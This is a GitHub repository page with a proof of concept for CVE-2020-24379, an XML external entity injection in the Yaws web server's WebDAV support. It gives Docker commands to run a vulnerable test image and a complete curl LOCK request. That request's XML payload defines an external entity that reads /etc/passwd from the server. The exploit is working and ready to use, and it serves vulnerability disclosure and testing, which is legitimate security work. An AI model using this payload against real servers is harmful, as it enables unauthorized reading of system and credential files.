Skip to content

Yaws web server XML external entity injection POC

Notifications You must be signed in to change notification settings

vulnbe/poc-yaws-dav-xxe

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 

Repository files navigation

XXE in Yaws web server (CVE-2020-24379)

Proof of concept

Build test image:

docker build -t vulnbe/yaws-pocs:xxe-dav-mod -f Dockerfile .

and/or

Run container docker run --rm -d -i -p 127.0.0.1:8000:8080 vulnbe/yaws-pocs:xxe-dav-mod

Then run:

curl -i -s -k -X LOCK http://localhost:8000/ -H 'Timeout: Second-1' \
  --data-binary @- << EOF
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/passwd">
]>
<d:lockinfo xmlns:d="DAV:">
  <d:lockscope><d:exclusive/></d:lockscope>
  <d:locktype><d:write/></d:locktype>
  <d:owner>
  <d:href><r>&sp;</r></d:href>
  </d:owner>
  </d:lockinfo>
EOF

Credit

Alexey Pronin (@vulnbe)

References

About

Yaws web server XML external entity injection POC

Topics

Resources

Stars

Watchers

Forks